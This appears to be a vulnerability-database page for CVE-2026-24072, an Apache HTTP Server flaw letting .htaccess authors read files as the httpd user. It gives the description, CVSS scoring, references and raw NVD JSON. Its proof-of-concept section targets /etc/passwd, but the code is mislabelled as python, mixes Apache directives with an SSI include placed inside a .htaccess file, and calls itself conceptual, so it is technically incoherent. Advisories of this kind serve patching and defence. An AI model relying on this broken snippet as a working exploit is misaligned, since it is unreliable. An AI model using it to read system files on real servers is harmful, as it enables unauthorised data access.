CVE-2026-24072

Description

An escalation of privilege bug in various modules in Apache HTTP 2.4.66 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. Users are recommended to upgrade to version 2.4.67, which fixes this issue.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* - VULNERABLE

Apache HTTP Server <= 2.4.66

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-24072
# Create a malicious .htaccess file in a web accessible directory
# This attempts to leverage the privilege escalation to read /etc/passwd

<IfModule mod_include.c>
    Options +Includes
    AddType text/html .html
    AddOutputFilter INCLUDES .html
</IfModule>

# The specific directive depends on the vulnerable module configuration
# Example using SSI to read a file (Conceptual)
<!--#include virtual="/etc/passwd" -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24072
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24072
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24072/
[4] VulDB https://vuldb.com/cve/CVE-2026-24072
[5] https://httpd.apache.org/security/vulnerabilities_24.html
[6] http://www.openwall.com/lists/oss-security/2026/05/04/18

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24072", "sourceIdentifier": "[email protected]", "published": "2026-05-04T13:16:00.297", "lastModified": "2026-05-04T20:27:50.263", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An escalation of privilege bug in various modules in Apache HTTP 2.4.66 and earlier allows local .htaccess authors to read files with the privileges of the httpd user.\n\nUsers are recommended to upgrade to version 2.4.67, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.67", "matchCriteriaId": "8FF781BA-CF81-400B-A155-4DAE0BD856EE"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/04/18", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}